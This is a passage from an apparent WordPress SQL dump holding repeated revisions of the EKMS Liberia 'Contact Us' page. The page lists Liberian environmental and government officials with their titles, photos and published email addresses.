10:30:09','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3395,42,'2021-01-22 10:31:13','2021-01-22 10:31:13','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:31:13','2021-01-22 10:31:13','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3396,42,'2021-01-22 10:31:13','2021-01-22 10:31:13','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:31:13','2021-01-22 10:31:13','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3397,42,'2021-01-22 10:31:13','2021-01-22 10:31:13','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah 